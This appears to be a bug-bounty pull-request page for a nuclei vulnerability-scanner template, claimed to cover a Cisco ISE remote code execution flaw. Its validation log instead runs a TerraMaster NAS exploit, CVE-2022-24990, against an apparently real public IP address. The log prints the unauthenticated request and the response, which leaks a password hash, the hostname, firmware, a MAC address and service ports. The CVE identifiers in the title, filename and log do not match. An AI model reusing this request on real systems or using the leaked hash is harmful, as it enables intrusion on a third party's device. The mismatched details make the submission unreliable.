PR
CVE-2025-20337.yaml
projectdiscovery/nuclei-templates#12820
Template / PR Information
Added CVE-2025-20281 Cisco Identity Services Engine (ISE) ERS Unauthenticated Remote Code Execution vulnerability template
- References: https://nvd.nist.gov/vuln/detail/CVE-2025-20281 https://github.com/B1ack4sh/Blackash-CVE-2025-20281
Template Validation
I’ve validated this template locally?
- YES
- NO
Additional Details
└─$ nuclei -t cve-2022-24990.yaml -u http://221.230.243.68:9500 -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.7
projectdiscovery.io
[ERR] nuclei version check failed got: Get "https://api.pdtm.sh/api/v1/tools/nuclei?arch=amd64&go_version=go1.24.2&machine_id=116cf73387cdcb5aabbac4ae7ad416e6dc1b00f5f91b05564c7d1bab25bd6631&os=kali&utm_source=unknown&v=v3.4.7": dial tcp: lookup api.pdtm.sh on 192.168.1.254:53: no such host
[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.2.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 41
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [cve-2022-24990] Dumped HTTP request for http://221.230.243.68:9500/module/api.php?mobile/webNasIPS
GET /module/api.php?mobile/webNasIPS HTTP/1.1
Host: 221.230.243.68:9500
User-Agent: TNAS
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [cve-2022-24990] Dumped HTTP response http://221.230.243.68:9500/module/api.php?mobile/webNasIPS
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json; charset=utf-8
Cross-Origin-Resource-Policy: same-origin
Date: Wed, 06 Aug 2025 22:24:04 GMT
Server: TOS/1.16.1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: TerraMaster
X-Xss-Protection: 1; mode=block
{"code":true,"msg":"webNasIPS successful","data":"NOTIFY Message\nIFC:188.81.232.173\nPWD:$1$o4r57/Tv$3/xzO52ndJ8BvyS/PTZ4n1\nSAT:1\nDAT:[{\"hostname\":\"TNAS-01088C\",\"firmware\":\"TOS3_A1.0_4.1.32\"},{\"network\":\"eth0\",\"ip\":\"192.168.1.10\",\"mask\":\"255.255.255.0\",\"mac\":\"6c:bf:b5:01:08:8c\"},{\"service\":[{\"name\":\"http_ssl\",\"url\":\"\",\"port\":\"5443\"},{\"name\":\"http\",\"url\":\"221.230.243.68:9500\",\"port\":\"8181\"},{\"name\":\"sys\",\"url\":\"221.230.243.68:9500\",\"port\":\"8181\"},{\"name\":\"channel\",\"url\":\"\",\"port\":0},{\"name\":\"pt\",\"url\":\"\",\"port\":0},{\"name\":\"ftp\",\"url\":\"\",\"port\":21},{\"name\":\"web_dav\",\"url\":\"\",\"port\":0},{\"name\":\"smb\",\"url\":\"\",\"port\":0}]}]","time":0.11636710166931152}
[cve-2022-24990:word-1] [http] [critical] http://221.230.243.68:9500/module/api.php?mobile/webNasIPS
[cve-2022-24990:status-2] [http] [critical] http://221.230.243.68:9500/module/api.php?mobile/webNasIPS
[INF] Scan completed in 673.009233ms. 2 matches found.
Additional References:
- Nuclei Template Creation Guideline
- Nuclei Template Matcher Guideline
- Nuclei Template Contribution Guideline
- PD-Community Discord server
/claim #12858
Claim
Total prize pool
$50
Total paid
$0
Status
Pending
Submitted
August 11, 2025
Last updated
August 11, 2025
Contributors
CI
ciscocamelo
@ciscocamelo
Sponsors
PR
ProjectDiscovery
@projectdiscovery
$50